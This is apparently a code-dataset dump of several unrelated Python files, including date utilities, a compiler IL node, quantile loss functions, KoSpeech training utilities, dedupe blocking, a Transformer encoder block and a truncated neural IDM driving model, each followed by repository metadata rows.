# last_monday = last_sunday - datetime.timedelta(days=6)
# print(last_sunday)
# print(last_monday)
# """
# output:
# 2
# 2019-06-09
# 2019-06-03
# """
#计算指定日期当月最后一天的日期和本月天数
def eomonth(date_object):
if date_object.month == 12:
next_month_first_date = datetime.date(date_object.year+1,1,1)
else:
next_month_first_date = datetime.date(date_object.year, date_object.month+1, 1)
return next_month_first_date - datetime.timedelta(1)
date = datetime.date(2017,12,20)
print(eomonth(date)) # 2017-12-31
print(eomonth(date).day) # 31 | 22.363636 | 87 | 0.699187 | 218 | 1,476 | 4.577982 | 0.307339 | 0.084168 | 0.032064 | 0.054108 | 0.114228 | 0.088176 | 0.088176 | 0.088176 | 0.088176 | 0 | 0 | 0.109363 | 0.138889 | 1,476 | 66 | 88 | 22.363636 | 0.675846 | 0.662602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.181818 | 0 | 0.363636 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f22b77e03d93c71a7b79660b3f1b0af9f098da | 337 | py | Python | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | src/code_generation/nodesIL/allocate_node_il.py | CRafa97/cool-compiler-2020 | e581d7b9e7755a9e241a97fa38b6e62364647574 | [
"MIT"
] | null | null | null | from .node_il import *
class AllocateNodeIL(InstructionNodeIL):
def __init__(self, itype, name, dest, idx=None):
super().__init__(idx)
self.type = itype
self.name = name
self.dest = dest
self.out = dest
def __str__(self):
return ("{} = ALLOCATE {}".format(self.dest, self.type)) | 25.923077 | 64 | 0.599407 | 40 | 337 | 4.725 | 0.55 | 0.084656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.27003 | 337 | 13 | 64 | 25.923077 | 0.768293 | 0 | 0 | 0 | 0 | 0 | 0.047337 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.1 | 0.1 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f32c7a98c6e8c80dea4da6614a925784f338bf | 782 | py | Python | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | 2 | 2021-01-08T08:52:04.000Z | 2021-01-18T06:30:19.000Z | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | null | null | null | Quantile Regression/0. pinball loss/pinball_loss.py | qute012/paper-review | 978dbb8891d1837e065493652877a971c448bafe | [
"Unlicense"
] | null | null | null | import torch
import torch.nn
class PinballLoss(nn.Module):
def __init__(self, quantile=0.10, reduction='mean'):
super(PinballLoss, self).__init__()
self.quantile = quantile
assert 0 < self.quantile
assert self.quantile < 1
self.reduction = reduction
def forward(self, output, target):
errors = target - output
if self.reduction=='mean':
return torch.mean(torch.max((self.quantile-1) * errors, self.quantile * errors))
elif self.reduction=='sum':
return torch.sum(torch.max((self.quantile-1) * errors, self.quantile * errors))
from tensorflow.keras.backend import mean, maximum
def quantile_loss(q, y, pred):
err = (y-pred)
return mean(maximum(q*err, (q-1)*err), axis=-1) | 34 | 92 | 0.640665 | 101 | 782 | 4.871287 | 0.366337 | 0.195122 | 0.079268 | 0.081301 | 0.182927 | 0.182927 | 0.182927 | 0.182927 | 0.182927 | 0 | 0 | 0.01495 | 0.230179 | 782 | 23 | 93 | 34 | 0.802326 | 0 | 0 | 0 | 0 | 0 | 0.014049 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 1 | 0.157895 | false | 0 | 0.157895 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f4b1b59b07121f986ac422d4df6f8a841dec7d | 5,765 | py | Python | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | kospeech/utils.py | arturs68/KoSpeech | b48ba0b1f963cc378e7dbc3cc90b87d3b3b1d516 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2020, Soohwan Kim. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
import torch.nn as nn
import logging
import platform
from omegaconf import DictConfig
from kospeech.optim.lr_scheduler.lr_scheduler import LearningRateScheduler
from kospeech.vocabs import Vocabulary
from torch import optim
from kospeech.optim import (
RAdam,
AdamP,
Novograd,
)
from kospeech.criterion import (
LabelSmoothedCrossEntropyLoss,
JointCTCCrossEntropyLoss,
TransducerLoss,
)
from kospeech.optim.lr_scheduler import (
TriStageLRScheduler,
TransformerLRScheduler,
)
logger = logging.getLogger(__name__)
def check_envirionment(use_cuda: bool) -> torch.device:
"""
Check execution envirionment.
OS, Processor, CUDA version, Pytorch version, ... etc.
"""
cuda = use_cuda and torch.cuda.is_available()
device = torch.device('cuda' if cuda else 'cpu')
logger.info(f"Operating System : {platform.system()} {platform.release()}")
logger.info(f"Processor : {platform.processor()}")
if str(device) == 'cuda':
for idx in range(torch.cuda.device_count()):
logger.info(f"device : {torch.cuda.get_device_name(idx)}")
logger.info(f"CUDA is available : {torch.cuda.is_available()}")
logger.info(f"CUDA version : {torch.version.cuda}")
logger.info(f"PyTorch version : {torch.__version__}")
else:
logger.info(f"CUDA is available : {torch.cuda.is_available()}")
logger.info(f"PyTorch version : {torch.__version__}")
return device
def get_optimizer(model: nn.Module, config: DictConfig):
supported_optimizer = {
'adam': optim.Adam,
'radam': RAdam,
'adamp': AdamP,
'adadelta': optim.Adadelta,
'adagrad': optim.Adagrad,
'novograd': Novograd,
}
assert config.train.optimizer.lower() in supported_optimizer.keys(), \
f"Unsupported Optimizer: {config.train.optimizer}\n" \
f"Supported Optimizer: {supported_optimizer.keys()}"
if config.model.architecture == 'conformer':
return optim.Adam(
model.parameters(),
betas=config.train.optimizer_betas,
eps=config.train.optimizer_eps,
weight_decay=config.train.weight_decay,
)
return supported_optimizer[config.train.optimizer](
model.module.parameters(),
lr=config.train.init_lr,
weight_decay=config.train.weight_decay,
)
def get_criterion(config: DictConfig, vocab: Vocabulary) -> nn.Module:
if config.model.architecture in ('deepspeech2', 'jasper'):
criterion = nn.CTCLoss(blank=vocab.blank_id, reduction=config.train.reduction, zero_infinity=True)
elif config.model.architecture in ('las', 'transformer') and config.model.joint_ctc_attention:
criterion = JointCTCCrossEntropyLoss(
num_classes=len(vocab),
ignore_index=vocab.pad_id,
reduction=config.train.reduction,
ctc_weight=config.model.ctc_weight,
cross_entropy_weight=config.model.cross_entropy_weight,
blank_id=vocab.blank_id,
dim=-1,
smoothing=config.train.label_smoothing,
)
elif config.model.architecture == 'conformer':
if config.model.decoder == 'rnnt':
criterion = TransducerLoss(blank_id=vocab.blank_id)
else:
criterion = nn.CTCLoss(blank=0, reduction=config.train.reduction, zero_infinity=True)
elif config.model.architecture == 'rnnt':
criterion = TransducerLoss(blank_id=vocab.blank_id)
elif config.model.architecture == 'transformer' and config.train.label_smoothing <= 0.0:
criterion = nn.CrossEntropyLoss(
ignore_index=vocab.pad_id,
reduction=config.train.reduction,
)
else:
criterion = LabelSmoothedCrossEntropyLoss(
num_classes=len(vocab),
ignore_index=vocab.pad_id,
smoothing=config.train.label_smoothing,
reduction=config.train.reduction,
dim=-1,
)
return criterion
def get_lr_scheduler(config: DictConfig, optimizer, epoch_time_step) -> LearningRateScheduler:
if config.train.lr_scheduler == "tri_stage_lr_scheduler":
lr_scheduler = TriStageLRScheduler(
optimizer=optimizer,
init_lr=config.train.init_lr,
peak_lr=config.train.peak_lr,
final_lr=config.train.final_lr,
init_lr_scale=config.train.init_lr_scale,
final_lr_scale=config.train.final_lr_scale,
warmup_steps=config.train.warmup_steps,
total_steps=int(config.train.num_epochs * epoch_time_step),
)
elif config.train.lr_scheduler == "transformer_lr_scheduler":
lr_scheduler = TransformerLRScheduler(
optimizer=optimizer,
peak_lr=config.train.peak_lr,
final_lr=config.train.final_lr,
final_lr_scale=config.train.final_lr_scale,
warmup_steps=config.train.warmup_steps,
decay_steps=config.train.decay_steps,
)
else:
raise ValueError(f"Unsupported Learning Rate Scheduler: {config.train.lr_scheduler}")
return lr_scheduler
| 36.257862 | 106 | 0.678057 | 672 | 5,765 | 5.650298 | 0.282738 | 0.089808 | 0.023176 | 0.038188 | 0.276797 | 0.228602 | 0.211219 | 0.194627 | 0.170398 | 0.129049 | 0 | 0.003122 | 0.222203 | 5,765 | 158 | 107 | 36.487342 | 0.843666 | 0.114657 | 0 | 0.280992 | 0 | 0 | 0.130521 | 0.04653 | 0 | 0 | 0 | 0 | 0.008264 | 1 | 0.033058 | false | 0 | 0.090909 | 0 | 0.165289 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f51a3253d92e78e87c1fc02bc05d0247ae5c21 | 7,056 | py | Python | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | dedupe/blocking.py | NickCrews/dedupe | 05ed2d81702d0d7557741f6a1e5b0cee13e42729 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from collections import defaultdict
import logging
import time
from typing import Generator, Tuple, Iterable, Dict, List, Union
from dedupe._typing import Record, RecordID, Data
import dedupe.predicates
logger = logging.getLogger(__name__)
Docs = Union[Iterable[str], Iterable[Iterable[str]]]
def index_list():
return defaultdict(list)
class Fingerprinter(object):
"""Takes in a record and returns all blocks that record belongs to"""
def __init__(self, predicates: List[dedupe.predicates.Predicate]) -> None:
self.predicates = predicates
self.index_fields: Dict[str, Dict[str, List[dedupe.predicates.IndexPredicate]]]
self.index_fields = defaultdict(index_list)
"""
A dictionary of all the fingerprinter methods that use an
index of data field values. The keys are the field names,
which can be useful to know for indexing the data.
"""
self.index_predicates = []
for full_predicate in predicates:
for predicate in full_predicate:
if hasattr(predicate, "index"):
self.index_fields[predicate.field][predicate.type].append(predicate)
self.index_predicates.append(predicate)
def __call__(
self, records: Iterable[Record], target: bool = False
) -> Generator[Tuple[str, RecordID], None, None]:
"""
Generate the predicates for records. Yields tuples of (predicate,
record_id).
Args:
records: A sequence of tuples of (record_id,
record_dict). Can often be created by
`data_dict.items()`.
target: Indicates whether the data should be treated as
the target data. This effects the behavior of
search predicates. If `target` is set to
`True`, an search predicate will return the
value itself. If `target` is set to `False` the
search predicate will return all possible
values within the specified search distance.
Let's say we have a
`LevenshteinSearchPredicate` with an associated
distance of `1` on a `"name"` field; and we
have a record like `{"name": "thomas"}`. If the
`target` is set to `True` then the predicate
will return `"thomas"`. If `target` is set to
`False`, then the blocker could return
`"thomas"`, `"tomas"`, and `"thoms"`. By using
the `target` argument on one of your datasets,
you will dramatically reduce the total number
of comparisons without a loss of accuracy.
.. code:: python
> data = [(1, {'name' : 'bob'}), (2, {'name' : 'suzanne'})]
> blocked_ids = deduper.fingerprinter(data)
> print list(blocked_ids)
[('foo:1', 1), ..., ('bar:1', 100)]
"""
start_time = time.perf_counter()
predicates = [
(":" + str(i), predicate) for i, predicate in enumerate(self.predicates)
]
for i, record in enumerate(records):
record_id, instance = record
for pred_id, predicate in predicates:
block_keys = predicate(instance, target=target)
for block_key in block_keys:
yield block_key + pred_id, record_id
if i and i % 10000 == 0:
logger.info(
"%(iteration)d, %(elapsed)f2 seconds",
{"iteration": i, "elapsed": time.perf_counter() - start_time},
)
def reset_indices(self) -> None:
"""
Fingeprinter indicdes can take up a lot of memory. If you are
done with blocking, the method will reset the indices to free up.
If you need to block again, the data will need to be re-indexed.
"""
for predicate in self.index_predicates:
predicate.reset()
def index(self, docs: Docs, field: str) -> None:
"""
Add docs to the indices used by fingerprinters.
Some fingerprinter methods depend upon having an index of
values that a field may have in the data. This method adds
those values to the index. If you don't have any fingerprinter
methods that use an index, this method will do nothing.
Args:
docs: an iterator of values from your data to index. While
not required, it is recommended that docs be a unique
set of of those values. Indexing can be an expensive
operation.
field: fieldname or key associated with the values you are
indexing
"""
indices = extractIndices(self.index_fields[field])
for doc in docs:
if doc:
for _, index, preprocess in indices:
index.index(preprocess(doc))
for index_type, index, _ in indices:
index.initSearch()
for predicate in self.index_fields[field][index_type]:
logger.debug("Canopy: %s", str(predicate))
predicate.index = index
predicate.bust_cache()
def unindex(self, docs: Docs, field: str) -> None:
"""Remove docs from indices used by fingerprinters
Args:
docs: an iterator of values from your data to remove. While
not required, it is recommended that docs be a unique
set of of those values. Indexing can be an expensive
operation.
field: fieldname or key associated with the values you are
unindexing
"""
indices = extractIndices(self.index_fields[field])
for doc in docs:
if doc:
for _, index, preprocess in indices:
try:
index.unindex(preprocess(doc))
except KeyError:
pass
for index_type, index, _ in indices:
index.initSearch()
for predicate in self.index_fields[field][index_type]:
logger.debug("Canopy: %s", str(predicate))
predicate.index = index
predicate.bust_cache()
def index_all(self, data: Data):
for field in self.index_fields:
unique_fields = {record[field] for record in data.values() if record[field]}
self.index(unique_fields, field)
def extractIndices(index_fields):
indices = []
for index_type, predicates in index_fields.items():
predicate = predicates[0]
index = predicate.index
preprocess = predicate.preprocess
if predicate.index is None:
index = predicate.initIndex()
indices.append((index_type, index, preprocess))
return indices
| 36 | 88 | 0.57483 | 810 | 7,056 | 4.928395 | 0.279012 | 0.027054 | 0.03006 | 0.013026 | 0.267285 | 0.252505 | 0.213427 | 0.213427 | 0.213427 | 0.213427 | 0 | 0.0039 | 0.345947 | 7,056 | 195 | 89 | 36.184615 | 0.861105 | 0.375283 | 0 | 0.240964 | 0 | 0 | 0.020666 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096386 | false | 0.012048 | 0.072289 | 0.012048 | 0.204819 | 0.012048 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f71ad4e5619ec0c9fbad726d9b050a60b5356a | 917 | py | Python | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | 15 | 2020-10-01T19:36:13.000Z | 2022-03-17T11:11:39.000Z | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | 7 | 2020-09-25T17:47:45.000Z | 2021-08-07T15:33:55.000Z | pythonProject1/venv/Lib/site-packages/pyinstaller_versionfile/__main__.py | mjtomlinson/CNE330_Python_1_Final_Project | 05020806860937ef37b9a0ad2e27de4897a606de | [
"CC0-1.0"
] | null | null | null | """
Main file for pyinstaller-versionfile, which is the entrypoint for the command line script.
"""
import argparse
import pyinstaller_versionfile
def main(args=None):
args = args or parse_args(args)
pyinstaller_versionfile.create_versionfile_from_input_file(
output_file=args.outfile,
input_file=args.metadata_file,
version=args.version
)
def parse_args(args):
parser = argparse.ArgumentParser(description="Create a version file for PyInstaller from a YAML metadata file.")
parser.add_argument("metadata_file", help="Path to YAML metadata file")
parser.add_argument("--outfile", default="./version_file.txt", help="Resulting version file for PyInstaller")
parser.add_argument("--version", default=None, help="Override Version information given in metadata file")
return parser.parse_args(args)
if __name__ == '__main__': # pragma: no cover
main()
| 31.62069 | 116 | 0.740458 | 118 | 917 | 5.542373 | 0.415254 | 0.091743 | 0.082569 | 0.076453 | 0.100917 | 0.100917 | 0 | 0 | 0 | 0 | 0 | 0 | 0.161396 | 917 | 28 | 117 | 32.75 | 0.850455 | 0.118866 | 0 | 0 | 0 | 0 | 0.295 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.117647 | 0 | 0.294118 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f762a7e68d5cf3b05bf0178feec36718bd6cf2 | 1,161 | py | Python | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | 160/intersectionoftwolinkedlist.py | cccccccccccccc/Myleetcode | fb3fa6df7c77feb2d252feea7f3507569e057c70 | [
"Apache-2.0"
] | null | null | null | # Definition for singly-linked list.
class ListNode:
def __init__(self, x):
self.val = x
self.next = None
class Solution:
def getIntersectionNode(self, headA: ListNode, headB: ListNode) -> ListNode:
if headA == headB:
return headA
lengthA = 0
tmpA = headA
while tmpA:
tmpA = tmpA.next
lengthA +=1
lengthB = 0
tmpB = headB
while tmpB:
tmpB = tmpB.next
lengthB +=1
l = headA
r = headB
if lengthA>lengthB:
m = lengthA-lengthB
for _ in range(m):
l = l.next
elif lengthA<lengthB:
n = lengthB-lengthA
for _ in range(n):
r = r.next
while l:
if l != r:
l = l.next
r = r.next
else:
break
return l
A = Solution()
a = ListNode(4)
b = ListNode(1)
c = ListNode(5)
d = ListNode(6)
e = ListNode(1)
f = ListNode(8)
g = ListNode(4)
a.next = b
b.next = f
c.next = d
d.next = e
e.next = f
f.next = g
print(A.getIntersectionNode(a,c)) | 22.326923 | 80 | 0.48062 | 145 | 1,161 | 3.806897 | 0.331034 | 0.076087 | 0.036232 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016467 | 0.424634 | 1,161 | 52 | 81 | 22.326923 | 0.80988 | 0.029285 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0 | 0 | 0.12 | 0.02 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f85797b6e8f01802b839c8fc0e11137d0f7f2c | 5,390 | py | Python | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | 2 | 2021-01-25T02:55:09.000Z | 2021-02-05T03:47:05.000Z | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | null | null | null | neural_sp/models/seq2seq/encoders/transformer_block.py | vpellegrain/neural_sp | 1daa40a8f7553f5648ead572546e92ed5fef2b4c | [
"Apache-2.0"
] | 1 | 2021-02-28T05:59:29.000Z | 2021-02-28T05:59:29.000Z | # Copyright 2020 Kyoto University (Hirofumi Inaguma)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Transformer encoder block."""
import logging
import random
import torch
import torch.nn as nn
from neural_sp.models.modules.multihead_attention import MultiheadAttentionMechanism as MHA
from neural_sp.models.modules.positionwise_feed_forward import PositionwiseFeedForward as FFN
from neural_sp.models.modules.relative_multihead_attention import RelativeMultiheadAttentionMechanism as RelMHA
random.seed(1)
logger = logging.getLogger(__name__)
class TransformerEncoderBlock(nn.Module):
"""A single layer of the Transformer encoder.
Args:
d_model (int): input dimension of MultiheadAttentionMechanism and PositionwiseFeedForward
d_ff (int): hidden dimension of PositionwiseFeedForward
n_heads (int): number of heads for multi-head attention
dropout (float): dropout probabilities for linear layers
dropout_att (float): dropout probabilities for attention distributions
dropout_layer (float): LayerDrop probability
layer_norm_eps (float): epsilon parameter for layer normalization
ffn_activation (str): nonolinear function for PositionwiseFeedForward
param_init (str): parameter initialization method
pe_type (str): type of positional encoding
clamp_len (int): maximum relative distance from each position
ffn_bottleneck_dim (int): bottleneck dimension for the light-weight FFN layer
"""
def __init__(self, d_model, d_ff, n_heads,
dropout, dropout_att, dropout_layer,
layer_norm_eps, ffn_activation, param_init,
pe_type, clamp_len, ffn_bottleneck_dim):
super(TransformerEncoderBlock, self).__init__()
self.n_heads = n_heads
self.rel_attn = pe_type in ['relaive', 'relative_xl']
# self-attention
self.norm1 = nn.LayerNorm(d_model, eps=layer_norm_eps)
mha = RelMHA if self.rel_attn else MHA
self.self_attn = mha(kdim=d_model,
qdim=d_model,
adim=d_model,
odim=d_model,
n_heads=n_heads,
dropout=dropout_att,
param_init=param_init,
xl_like=pe_type == 'relative_xl',
clamp_len=clamp_len)
# position-wise feed-forward
self.norm2 = nn.LayerNorm(d_model, eps=layer_norm_eps)
self.feed_forward = FFN(d_model, d_ff, dropout, ffn_activation, param_init,
ffn_bottleneck_dim)
self.dropout = nn.Dropout(dropout)
self.dropout_layer = dropout_layer
self.reset_visualization()
@property
def xx_aws(self):
return self._xx_aws
def reset_visualization(self):
self._xx_aws = None
def forward(self, xs, xx_mask=None, cache=None,
pos_embs=None, u_bias=None, v_bias=None):
"""Transformer encoder layer definition.
Args:
xs (FloatTensor): `[B, T (query), d_model]`
xx_mask (ByteTensor): `[B, T (query), T (key)]`
cache (dict):
input_san: `[B, n_hist, d_model]`
output: `[B, n_hist, d_model]`
pos_embs (LongTensor): `[T (query), 1, d_model]`
u_bias (FloatTensor): global parameter for relative positional encoding
v_bias (FloatTensor): global parameter for relative positional encoding
Returns:
xs (FloatTensor): `[B, T (query), d_model]`
new_cache (dict):
input_san: `[B, n_hist+T, d_model]`
output: `[B, T (query), d_model]`
"""
self.reset_visualization()
new_cache = {}
qlen = xs.size(1)
# LayerDrop
if self.dropout_layer > 0:
if self.training and random.random() < self.dropout_layer:
return xs, new_cache
else:
xs = xs / (1 - self.dropout_layer)
##################################################
# self-attention
##################################################
residual = xs # `[B, qlen, d_model]`
xs = self.norm1(xs) # pre-norm
# cache
if cache is not None:
xs = torch.cat([cache['input_san'], xs], dim=1)
new_cache['input_san'] = xs
xs_kv = xs
if cache is not None:
xs = xs[:, -qlen:]
residual = residual[:, -qlen:] # `[B, qlen, d_model]`
xx_mask = xx_mask[:, -qlen:]
if self.rel_attn:
xs, self._xx_aws = self.self_attn(xs_kv, xs, pos_embs, xx_mask, u_bias, v_bias) # k/q/m
else:
xs, self._xx_aws = self.self_attn(xs_kv, xs_kv, xs, mask=xx_mask)[:2] # k/v/q
# assert xs.size() == residual.size()
xs = self.dropout(xs) + residual
##################################################
# position-wise feed-forward
##################################################
residual = xs # `[B, qlen, d_model]`
xs = self.norm2(xs) # pre-norm
xs = self.feed_forward(xs)
xs = self.dropout(xs) + residual
new_cache['output'] = xs
return xs, new_cache
| 37.430556 | 111 | 0.575139 | 629 | 5,390 | 4.701113 | 0.263911 | 0.038553 | 0.016233 | 0.018262 | 0.211701 | 0.144741 | 0.132567 | 0.099425 | 0.019614 | 0.019614 | 0 | 0.005022 | 0.298145 | 5,390 | 143 | 112 | 37.692308 | 0.776632 | 0.337848 | 0 | 0.171429 | 0 | 0 | 0.016783 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.1 | 0.014286 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2f8823364ceabac4d77a08f5b8e4048e81d7f80 | 14,490 | py | Python | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | 1 | 2021-03-26T15:28:31.000Z | 2021-03-26T15:28:31.000Z | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | null | null | null | src/models/core/neural_idm.py | saArbabi/sim | cc6fd2d71c3621f47616e830db83244e51d28a28 | [
"MIT"
] | null | null | null |
from tensorflow.keras.layers import Dense, LSTM, Bidirectional, TimeDistributed, LeakyReLU
from keras import backend as K
from importlib import reload
from models.core import abstract_model
reload(abstract_model)
from models.core.abstract_model import AbstractModel
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
class NeurIDMModel(AbstractModel):
def __init__(self, config):
super(NeurIDMModel, self).__init__(config)
self.f_seq_encoder = FutureEncoder()
self.h_seq_encoder = HistoryEncoder()
self.belief_net = BeliefModel(config)
self.forward_sim = IDMForwardSim(config)
self.idm_layer = IDMLayer()
self.loss_function = tf.keras.losses.Huber()
self.vae_loss_weight = config['model_config']['vae_loss_weight']
# self.loss_function = tf.keras.losses.MeanAbsoluteError()
# self.loss_function = tf.keras.losses.MeanSquaredError()
def callback_def(self):
self.train_mseloss = tf.keras.metrics.Mean()
self.test_mseloss = tf.keras.metrics.Mean()
self.train_klloss = tf.keras.metrics.Mean()
self.test_klloss = tf.keras.metrics.Mean()
def mse(self, act_true, act_pred):
act_true = (act_true)/0.1
act_pred = (act_pred)/0.1
loss = self.loss_function(act_true, act_pred)
tf.debugging.check_numerics(loss, message='Checking loss')
return loss
def kl_loss(self, pri_params, pos_params):
pri_mean, pri_logsigma = pri_params
pos_mean, pos_logsigma = pos_params
prior = tfd.Normal(loc=pri_mean, scale=tf.exp(pri_logsigma))
posterior = tfd.Normal(loc=pos_mean, scale=tf.exp(pos_logsigma))
return tf.reduce_mean(tfp.distributions.kl_divergence(posterior, prior))
def train_loop(self, data_objs):
# tf.print('######## TRAIN #######:')
train_ds = self.batch_data(data_objs)
for history_sca, future_sca, future_idm_s, future_m_veh_c, future_ego_a in train_ds:
self.train_step([history_sca, future_sca, future_idm_s, future_m_veh_c], future_ego_a)
def test_loop(self, data_objs):
train_ds = self.batch_data(data_objs)
for history_sca, future_sca, future_idm_s, future_m_veh_c, future_ego_a in train_ds:
self.test_step([history_sca, future_sca, future_idm_s, future_m_veh_c], future_ego_a)
@tf.function(experimental_relax_shapes=True)
def train_step(self, states, targets):
with tf.GradientTape() as tape:
act_pred, pri_params, pos_params = self(states)
mse_loss = self.mse(targets, act_pred)
kl_loss = self.kl_loss(pri_params, pos_params)
loss = self.vae_loss(mse_loss, kl_loss)
gradients = tape.gradient(loss, self.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
self.train_mseloss.reset_states()
self.train_klloss.reset_states()
self.train_mseloss(mse_loss)
self.train_klloss(kl_loss)
@tf.function(experimental_relax_shapes=True)
def test_step(self, states, targets):
act_pred, pri_params, pos_params = self(states)
mse_loss = self.mse(targets, act_pred)
kl_loss = self.kl_loss(pri_params, pos_params)
loss = self.vae_loss(mse_loss, kl_loss)
self.test_mseloss.reset_states()
self.test_klloss.reset_states()
self.test_mseloss(mse_loss)
self.test_klloss(kl_loss)
def vae_loss(self, mse_loss, kl_loss):
return self.vae_loss_weight*kl_loss + mse_loss
def call(self, inputs):
enc_h = self.h_seq_encoder(inputs[0]) # history
enc_f = self.f_seq_encoder(inputs[1])
pri_params, pos_params = self.belief_net(\
[enc_h, enc_f], dis_type='both')
z_idm, z_att = self.belief_net.sample_z(pos_params)
env_state = inputs[0][:, -1, :]
proj_idm = self.belief_net.z_proj_idm(tf.concat([z_idm, env_state], axis=-1))
